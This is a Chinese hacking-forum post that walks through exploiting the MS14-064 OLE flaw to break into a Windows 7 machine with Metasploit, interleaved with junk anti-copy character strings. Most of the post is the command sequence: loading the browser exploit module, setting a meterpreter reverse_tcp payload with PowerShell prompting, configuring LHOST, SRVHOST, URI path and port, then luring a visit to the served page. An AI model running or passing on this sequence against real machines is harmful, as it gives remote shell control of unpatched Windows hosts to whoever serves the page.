找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1581|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

( N( l# p- D# i- l: g( g/ C4 d 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示, s3 H7 _. `. {# h3 c% B0 `! B. [1 Q

8 c& ~/ u6 L$ E+ W

! e5 l! n C6 k 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 8 l! @2 S1 g' ^% \

, G2 u- |' g# K7 z" E1 ?

Z3 t9 b: I6 ^# p( l( A0 S3 P5 N, v6 P 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp # `4 ]/ L7 m9 h- \' @2 p1 t4 ]

. X- \6 T6 V i2 J6 u2 R( o

: E9 w5 l) G* E8 K8 B- |+ ^/ \. F5 q             set AllowPowershellPrompt true 3 b1 j- o' u% F+ r5 i0 g0 f

7 C" Y8 ]3 K, u) P2 |8 `5 J. `) Y

/ ^" B; L" L3 b5 C             Set LHOST 192.168.0.1099 r. G, u- x9 w

& Z1 Q0 C) X' g; |. u, O& Q$ j

% F2 c! I8 @! {5 i( l             set SRVHOST 192.168.0.109 W( I7 c! c; A* @# z; J+ N4 W' u

/ C, i$ ^/ N4 f7 y. [, C6 j. k

& o) c. E7 ]" p9 J             Set uripath share + f0 h: l' z& N( D

! {. H% e2 U' |/ U' n( X

7 {1 G$ h: [# k- W$ j             Set srvport 80 * n) e2 z' w, H

- ]1 ]. I3 D( b9 ]" S

3 n, d4 C- x: g/ S   2 z! r; a; D7 V; I" E/ B: R: K e

# M5 j# }- I5 R3 `; }1 |% z

8 D6 V$ F% k0 }. @" n7 e  ' J. ~; k+ L2 W4 m+ W9 x

* a; A1 g# N# }3 o3 L' P3 N6 E7 \

) V: J% j7 j2 t% J9 f2 u. L& E  0 M5 v0 d6 J- H, C

$ D- Q+ I8 W3 o9 r. w

# i& t2 F1 P" d6 h7 R" b8 r  2 s* ^: ]4 H+ }

) T5 l5 ^& r, f

3 @1 Z2 U2 Q) Z4 ]   7 @5 k8 V3 ^3 C* [8 N

) R1 ?$ }7 a2 h: s5 J7 \

6 {$ J5 N, A8 \/ s 下面我们来访问本地地址如图:" p5 b, ]" `0 I- b' W

% Q; J0 d9 n) K Q v) G6 e

$ o( [% Y) C" _" T8 G   & C: }: w2 r2 p# X

* l7 n' H9 f5 Z

1 d! v" N; v: b# u5 F  9 A0 e3 x# r) z& f4 k

^6 B4 K; A8 ]# X: {

( A, K+ i# T7 q 6 g$ F+ u) p( x. h5 e) s

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表